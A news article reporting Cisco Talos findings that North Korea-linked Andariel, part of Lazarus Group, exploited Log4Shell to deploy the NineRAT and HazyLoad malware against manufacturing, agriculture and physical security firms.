Lazarus Group targets organisations worldwide exploiting Log4j vulnerability

The hackers launched a a series of cyberattacks against companies in the manufacturing, agriculture and physical security sectors.


The Log4j vulnerability has been exploited by hackers linked to Lazarus Group in a series of cyberattacks against companies in the manufacturing, agriculture and physical security sectors.

The attacks were part of ‘Operation Blacksmith’, which involved using at least three new malware families, as researchers at Cisco Talos reported. One of these malware families was ‘NineRAT,’ a remote access trojan (RAT) that allows an attacker to control an infected computer remotely.

‘”Operation Blacksmith” leveraged CVE-2021-44228, also known as Log4Shell, to compromise vulnerable systems exposed to the internet, and deployed a novel DLang-based RAT that used Telegram as its [command-and-control] channel,’ the researchers said.

The hackers used Telegram as a command-and-control channel to evade detection and control the NineRAT malware, which had three components and enabled persistence on the infected device. The hackers also used the HazyLoad backdoor and Log4Shell to compromise public-facing VMWare Horizon servers and conduct reconnaissance and further attacks. Log4Shell remains a serious threat two years after its discovery, as many applications still use vulnerable versions of Log4j.

Researchers discovered that NineRAT was created in May 2022 and first deployed in March 2023 against a South American agricultural organisation. It was then used again in September 2023 against a European manufacturer.

Cisco Talos linked Operation Blacksmith to Andariel, a hacking group associated with North Korea, because of the use of a sophisticated tool called ‘HazyLoad.’ This tool which was detected in the breach of a European company and the American subsidiary of a South Korean physical security and surveillance company in May 2023.

Andariel usually focuses on gaining initial access, conducting reconnaissance and maintaining long-term access for espionage purposes in support of the North Korean government’s national interests. The researchers also mentioned that Andariel had previously launched ransomware attacks against healthcare organisations.

Andariel is believed to be a subsidiary of Lazarus Group. Cisco Talos confirmed that Lazarus Group is a collective name for several sub-groups operating from North Korea, as previously reported by cybersecurity agencies and experts. The sub-groups run ‘their own campaigns and use custom-made malware against their targets, without necessarily coordinating with each other.’